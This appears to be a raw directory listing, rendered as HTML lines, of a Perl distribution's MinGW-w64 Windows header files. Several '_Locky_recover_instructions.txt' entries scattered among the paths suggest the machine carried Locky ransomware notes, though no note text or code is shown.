c:\Perl\c\i686-w64-mingw32\include\mqoai.h<br />
c:\Perl\c\i686-w64-mingw32\include\msacm.h<br />
c:\Perl\c\i686-w64-mingw32\include\msacmdlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\msado15.h<br />
c:\Perl\c\i686-w64-mingw32\include\msasn1.h<br />
c:\Perl\c\i686-w64-mingw32\include\msber.h<br />
c:\Perl\c\i686-w64-mingw32\include\mschapp.h<br />
c:\Perl\c\i686-w64-mingw32\include\msclus.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdadc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaipp.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaipper.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaora.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaosp.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdasc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdasql.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdatsrc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdshape.h<br />
c:\Perl\c\i686-w64-mingw32\include\msfs.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmcid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmdid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmhst.h<br />
c:\Perl\perl\lib\CORE\dirent.h<br />
c:\Perl\perl\lib\CORE\cv.h<br />
c:\Perl\c\i686-w64-mingw32\include\msi.h<br />
c:\Perl\c\i686-w64-mingw32\include\msidefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\msimcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\msimcsdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\msiquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\msoav.h<br />
c:\Perl\c\i686-w64-mingw32\include\msp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspab.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspaddr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspcall.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspcoll.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspenum.h<br />
c:\Perl\c\i686-w64-mingw32\include\msplog.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspst.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspstrm.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspterm.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspthrd.h<br />
c:\Perl\c\i686-w64-mingw32\include\msptrmac.h<br />
c:\Perl\c\i686-w64-mingw32\include\msptrmar.h<br />
c:\Perl\c\i686-w64-mingw32\include\msptrmvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msputils.h<br />
c:\Perl\c\i686-w64-mingw32\include\msremote.h<br />
c:\Perl\c\i686-w64-mingw32\include\mssip.h<br />
c:\Perl\c\i686-w64-mingw32\include\msstkppg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mstask.h<br />
c:\Perl\c\i686-w64-mingw32\include\mstcpip.h<br />
c:\Perl\c\i686-w64-mingw32\include\msterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mswsock.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxml.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxml2.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxml2did.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxmldid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtsadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtsadmin_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\mtsevents.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtsgrp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtx.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtxadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtxadmin_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\mtxattr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtxdm.h<br />
c:\Perl\c\i686-w64-mingw32\include\multimon.h<br />
c:\Perl\c\i686-w64-mingw32\include\multinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\nb30.h<br />
c:\Perl\c\i686-w64-mingw32\include\ndr64types.h<br />
c:\Perl\c\i686-w64-mingw32\include\ndrtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\netcon.h<br />
c:\Perl\c\i686-w64-mingw32\include\neterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\netmon.h<br />
c:\Perl\c\i686-w64-mingw32\include\netprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\new.h<br />
c:\Perl\c\i686-w64-mingw32\include\newapis.h<br />
c:\Perl\c\i686-w64-mingw32\include\nmsupp.h<br />
c:\Perl\c\i686-w64-mingw32\include\npapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\nspapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntddndis.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntddpsch.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntddscsi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntdsapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntdsbcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntdsbmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntgdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntldap.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntmsapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntmsmli.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntsdexts.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntsecapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntsecpkg.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntstatus.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntverp.h<br />
c:\Perl\c\i686-w64-mingw32\include\oaidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\objbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\objerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\objidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\objsafe.h<br />
c:\Perl\c\i686-w64-mingw32\include\objsel.h<br />
c:\Perl\c\i686-w64-mingw32\include\ocidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\ocmm.h<br />
c:\Perl\c\i686-w64-mingw32\include\odbcinst.h<br />
c:\Perl\c\i686-w64-mingw32\include\odbcss.h<br />
c:\Perl\c\i686-w64-mingw32\include\ole.h<br />
c:\Perl\c\i686-w64-mingw32\include\ole2.h<br />
c:\Perl\c\i686-w64-mingw32\include\ole2ver.h<br />
c:\Perl\c\i686-w64-mingw32\include\oleacc.h<br />
c:\Perl\c\i686-w64-mingw32\include\oleauto.h<br />
c:\Perl\c\i686-w64-mingw32\include\olectl.h<br />
c:\Perl\c\i686-w64-mingw32\include\olectlid.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledb.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledbdep.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledberr.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledbguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\oleidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\oletx2xa.h<br />
c:\Perl\c\i686-w64-mingw32\include\omp.h<br />
c:\Perl\c\i686-w64-mingw32\include\parser.h<br />
c:\Perl\c\i686-w64-mingw32\include\patchapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\patchwiz.h<br />
c:\Perl\c\i686-w64-mingw32\include\pbt.h<br />
c:\Perl\c\i686-w64-mingw32\include\pchannel.h<br />
c:\Perl\c\i686-w64-mingw32\include\pcrt32.h<br />
c:\Perl\c\i686-w64-mingw32\include\pdh.h<br />
c:\Perl\c\i686-w64-mingw32\include\pdhmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\penwin.h<br />
c:\Perl\c\i686-w64-mingw32\include\perhist.h<br />
c:\Perl\c\i686-w64-mingw32\include\persist.h<br />
c:\Perl\c\i686-w64-mingw32\include\pgobootrun.h<br />
c:\Perl\c\i686-w64-mingw32\include\polarity.h<br />
c:\Perl\c\i686-w64-mingw32\include\poppack.h<br />
c:\Perl\c\i686-w64-mingw32\include\powrprof.h<br />
c:\Perl\c\i686-w64-mingw32\include\process.h<br />
c:\Perl\c\i686-w64-mingw32\include\profile.h<br />
c:\Perl\c\i686-w64-mingw32\include\profinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\propidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\prsht.h<br />
c:\Perl\c\i686-w64-mingw32\include\psapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack1.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack2.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack4.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack8.h<br />
c:\Perl\c\i686-w64-mingw32\include\pstore.h<br />
c:\Perl\c\i686-w64-mingw32\include\qmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\qnetwork.h<br />
c:\Perl\c\i686-w64-mingw32\include\qos.h<br />
c:\Perl\c\i686-w64-mingw32\include\qosname.h<br />
c:\Perl\c\i686-w64-mingw32\include\qospol.h<br />
c:\Perl\c\i686-w64-mingw32\include\qossp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ras.h<br />
c:\Perl\c\i686-w64-mingw32\include\rasdlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\raseapif.h<br />
c:\Perl\c\i686-w64-mingw32\include\raserror.h<br />
c:\Perl\c\i686-w64-mingw32\include\rassapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\rasshost.h<br />
c:\Perl\c\i686-w64-mingw32\include\ratings.h<br />
c:\Perl\c\i686-w64-mingw32\include\reason.h<br />
c:\Perl\c\i686-w64-mingw32\include\recguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\reconcil.h<br />
c:\Perl\c\i686-w64-mingw32\include\regstr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rend.h<br />
c:\Perl\c\i686-w64-mingw32\include\resapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\richedit.h<br />
c:\Perl\c\i686-w64-mingw32\include\richole.h<br />
c:\Perl\c\i686-w64-mingw32\include\rkeysvcc.h<br />
c:\Perl\c\i686-w64-mingw32\include\rnderr.h<br />
c:\Perl\c\i686-w64-mingw32\include\routprot.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpc.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcasync.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcdce.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcdcep.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcndr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcnsi.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcnsip.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcnterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcproxy.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcssl.h<br />
c:\Perl\c\i686-w64-mingw32\include\rrascfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtcapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtccore.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtcerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtm.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtmv2.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtutils.h<br />
c:\Perl\c\i686-w64-mingw32\include\scarddat.h<br />
c:\Perl\c\i686-w64-mingw32\include\scarderr.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardsrv.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardssp.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardssp_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\scardssp_p.c<br />
c:\Perl\c\i686-w64-mingw32\include\scesvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\schannel.h<br />
c:\Perl\c\i686-w64-mingw32\include\schedule.h<br />
c:\Perl\c\i686-w64-mingw32\include\schemadef.h<br />
c:\Perl\c\i686-w64-mingw32\include\schnlsp.h<br />
c:\Perl\c\i686-w64-mingw32\include\scode.h<br />
c:\Perl\c\i686-w64-mingw32\include\scrnsave.h<br />
c:\Perl\c\i686-w64-mingw32\include\scrptids.h<br />
c:\Perl\c\i686-w64-mingw32\include\sddl.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdkddkver.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdks\_mingw_directx.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdks\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sdoias.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdpblb.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdperr.h<br />
c:\Perl\c\i686-w64-mingw32\include\search.h<br />
c:\Perl\c\i686-w64-mingw32\include\secext.h<br />
c:\Perl\c\i686-w64-mingw32\include\security.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\conio_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\crtdbg_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\io_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\mbstring_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\search_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\stdio_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\stdlib_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\stralign_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\string_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys\timeb_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\tchar_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\time_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\wchar_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sehmap.h<br />
c:\Perl\c\i686-w64-mingw32\include\sens.h<br />
c:\Perl\c\i686-w64-mingw32\include\sensapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sensevts.h<br />
c:\Perl\c\i686-w64-mingw32\include\servprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\setjmp.h<br />
c:\Perl\c\i686-w64-mingw32\include\setjmpex.h<br />
c:\Perl\c\i686-w64-mingw32\include\setupapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sfc.h<br />
c:\Perl\c\i686-w64-mingw32\include\shappmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\share.h<br />
c:\Perl\c\i686-w64-mingw32\include\shdeprecated.h<br />
c:\Perl\c\i686-w64-mingw32\include\shdispid.h<br />
c:\Perl\c\i686-w64-mingw32\include\shellapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\shfolder.h<br />
c:\Perl\c\i686-w64-mingw32\include\shldisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\shlguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\shlobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\shlwapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\shobjidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\shtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\signal.h<br />
c:\Perl\c\i686-w64-mingw32\include\simpdata.h<br />
c:\Perl\c\i686-w64-mingw32\include\simpdc.h<br />
c:\Perl\c\i686-w64-mingw32\include\sipbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\sisbkup.h<br />
c:\Perl\c\i686-w64-mingw32\include\smpab.h<br />
c:\Perl\c\i686-w64-mingw32\include\smpms.h<br />
c:\Perl\c\i686-w64-mingw32\include\smpxp.h<br />
c:\Perl\c\i686-w64-mingw32\include\smtpguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\smx.h<br />
c:\Perl\c\i686-w64-mingw32\include\snmp.h<br />
c:\Perl\c\i686-w64-mingw32\include\softpub.h<br />
c:\Perl\c\i686-w64-mingw32\include\specstrings.h<br />
c:\Perl\c\i686-w64-mingw32\include\sporder.h<br />
c:\Perl\c\i686-w64-mingw32\include\sql.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqlext.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqloledb.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqltypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqlucode.h<br />
c:\Perl\c\i686-w64-mingw32\include\sql_1.h<br />
c:\Perl\c\i686-w64-mingw32\include\srrestoreptapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\srv.h<br />
c:\Perl\licenses\License.rtf<br />
c:\Perl\licenses\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sspi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sspserr.h<br />
c:\Perl\c\i686-w64-mingw32\include\sspsidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdarg.h<br />
c:\Perl\c\i686-w64-mingw32\include\stddef.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdexcpt.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdint.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdio.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdlib.h<br />
c:\Perl\c\i686-w64-mingw32\include\sti.h<br />
c:\Perl\c\i686-w64-mingw32\include\stierr.h<br />
c:\Perl\c\i686-w64-mingw32\include\stireg.h<br />
c:\Perl\c\i686-w64-mingw32\include\stllock.h<br />
c:\Perl\c\i686-w64-mingw32\include\stm.h<br />
c:\Perl\c\i686-w64-mingw32\include\storage.h<br />
c:\Perl\c\i686-w64-mingw32\include\storprop.h<br />
c:\Perl\c\i686-w64-mingw32\include\stralign.h<br />
c:\Perl\c\i686-w64-mingw32\include\string.h<br />
c:\Perl\c\i686-w64-mingw32\include\strings.h<br />
c:\Perl\c\i686-w64-mingw32\include\strmif.h<br />
c:\Perl\c\i686-w64-mingw32\include\strsafe.h<br />
c:\Perl\c\i686-w64-mingw32\include\subauth.h<br />
c:\Perl\c\i686-w64-mingw32\include\subsmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\svcguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\svrapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\cdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sys\fcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\file.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\ioctl.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\locking.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\param.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\stat.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\time.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\timeb.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\types.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\unistd.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\utime.h<br />
c:\Perl\c\i686-w64-mingw32\include\syslimits.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3cc.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3ds.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3err.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3if.h<br />
c:\Perl\c\i686-w64-mingw32\include\tcerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\tcguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\tchar.h<br />
c:\Perl\c\i686-w64-mingw32\include\termmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\textserv.h<br />
c:\Perl\c\i686-w64-mingw32\include\time.h<br />
c:\Perl\c\i686-w64-mingw32\include\timeprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\tlhelp32.h<br />
c:\Perl\c\i686-w64-mingw32\include\tlogstg.h<br />
c:\Perl\c\i686-w64-mingw32\include\tmschema.h<br />
c:\Perl\c\i686-w64-mingw32\include\tnef.h<br />
c:\Perl\c\i686-w64-mingw32\include\tom.h<br />
c:\Perl\c\i686-w64-mingw32\include\traffic.h<br />
c:\Perl\c\i686-w64-mingw32\include\transact.h<br />
c:\Perl\c\i686-w64-mingw32\include\triedcid.h<br />
c:\Perl\c\i686-w64-mingw32\include\triediid.h<br />
c:\Perl\c\i686-w64-mingw32\include\triedit.h<br />
c:\Perl\c\i686-w64-mingw32\include\tspi.h<br />
c:\Perl\c\i686-w64-mingw32\include\tsuserex.h<br />
c:\Perl\c\i686-w64-mingw32\include\tsuserex_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\tvout.h<br />
c:\Perl\c\i686-w64-mingw32\include\txcoord.h<br />
c:\Perl\c\i686-w64-mingw32\include\txctx.h<br />
c:\Perl\c\i686-w64-mingw32\include\txdtc.h<br />
c:\Perl\c\i686-w64-mingw32\include\typeinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\uastrfnc.h<br />
c:\Perl\c\i686-w64-mingw32\include\umx.h<br />
c:\Perl\c\i686-w64-mingw32\include\unistd.h<br />
c:\Perl\c\i686-w64-mingw32\include\unknwn.h<br />
c:\Perl\c\i686-w64-mingw32\include\urlhist.h<br />
c:\Perl\c\i686-w64-mingw32\include\urlmon.h<br />
c:\Perl\c\i686-w64-mingw32\include\userenv.h<br />
c:\Perl\c\i686-w64-mingw32\include\usp10.h<br />
c:\Perl\c\i686-w64-mingw32\include\utime.h<br />
c:\Perl\c\i686-w64-mingw32\include\uuids.h<br />
c:\Perl\c\i686-w64-mingw32\include\uxtheme.h<br />
c:\Perl\c\i686-w64-mingw32\include\vadefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\varargs.h<br />
c:\Perl\c\i686-w64-mingw32\include\vcr.h<br />
c:\Perl\c\i686-w64-mingw32\include\vdmdbg.h<br />
c:\Perl\c\i686-w64-mingw32\include\vfw.h<br />
c:\Perl\c\i686-w64-mingw32\include\vfwmsgs.h<br />
c:\Perl\c\i686-w64-mingw32\include\vmr9.h<br />
c:\Perl\c\i686-w64-mingw32\include\w32api.h<br />
c:\Perl\c\i686-w64-mingw32\include\wab.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabcode.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabiab.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabmem.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabnot.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabtags.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabutil.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemads.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemdisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemtran.h<br />
c:\Perl\c\i686-w64-mingw32\include\wchar.h<br />
c:\Perl\c\i686-w64-mingw32\include\wctype.h<br />
c:\Perl\c\i686-w64-mingw32\include\wfext.h<br />
c:\Perl\c\i686-w64-mingw32\include\wia.h<br />
c:\Perl\c\i686-w64-mingw32\include\wiadef.h<br />
c:\Perl\c\i686-w64-mingw32\include\wiadevd.h<br />
c:\Perl\c\i686-w64-mingw32\include\wiavideo.h<br />
c:\Perl\c\i686-w64-mingw32\include\winable.h<br />
c:\Perl\c\i686-w64-mingw32\include\winbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\winber.h<br />
c:\Perl\c\i686-w64-mingw32\include\wincon.h<br />
c:\Perl\c\i686-w64-mingw32\include\wincred.h<br />
c:\Perl\c\i686-w64-mingw32\include\wincrypt.h<br />
c:\Perl\c\i686-w64-mingw32\include\windef.h<br />
c:\Perl\c\i686-w64-mingw32\include\windns.h<br />
c:\Perl\c\i686-w64-mingw32\include\windows.h<br />
c:\Perl\c\i686-w64-mingw32\include\windowsx.h<br />
c:\Perl\c\i686-w64-mingw32\include\winefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\winerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\wingdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wininet.h<br />
c:\Perl\c\i686-w64-mingw32\include\winioctl.h<br />
c:\Perl\c\i686-w64-mingw32\include\winldap.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnetwk.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnls.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnls32.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnt.h<br />
c:\Perl\c\i686-w64-mingw32\include\winperf.h<br />
c:\Perl\c\i686-w64-mingw32\include\winreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\winresrc.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsafer.h<br />
c:\Perl\c\i686-w64-mingw32\include\winscard.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsmcrd.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsnmp.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsock.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsock2.h<br />
c:\Perl\c\i686-w64-mingw32\include\winspool.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\winternl.h<br />
c:\Perl\c\i686-w64-mingw32\include\wintrust.h<br />
c:\Perl\c\i686-w64-mingw32\include\winuser.h<br />
c:\Perl\c\i686-w64-mingw32\include\winver.h<br />
c:\Perl\c\i686-w64-mingw32\include\winwlx.h<br />
c:\Perl\c\i686-w64-mingw32\include\wmiatlprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\wmistr.h<br />
c:\Perl\c\i686-w64-mingw32\include\wmiutils.h<br />
c:\Perl\c\i686-w64-mingw32\include\wownt16.h<br />
c:\Perl\c\i686-w64-mingw32\include\wownt32.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpapimsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpcrsmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpftpmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wppstmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpspihlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\wptypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpwizmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2atm.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2dnet.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2ipdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2spi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2tcpip.h<br />
c:\Perl\c\i686-w64-mingw32\include\wshisotp.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsipv6ok.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsipx.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsnetbs.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsnwlink.h<br />
c:\Perl\c\i686-w64-mingw32\include\wspiapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsrm.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsvns.h<br />
c:\Perl\c\i686-w64-mingw32\include\wtsapi32.h<br />
c:\Perl\c\i686-w64-mingw32\include\wtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\xa.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmc.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmcext.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmcmsx2.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmcmsxt.h<br />
c:\Perl\c\i686-w64-mingw32\include\xenroll.h<br />
c:\Perl\c\i686-w64-mingw32\include\xlocinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\xmath.h<br />
c:\Perl\c\i686-w64-mingw32\include\xmldomdid.h<br />
c:\Perl\c\i686-w64-mingw32\include\xmldsodid.h<br />
c:\Perl\c\i686-w64-mingw32\include\xmltrnsf.h<br />
c:\Perl\c\i686-w64-mingw32\include\xolehlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ymath.h<br />
c:\Perl\c\i686-w64-mingw32\include\yvals.h<br />
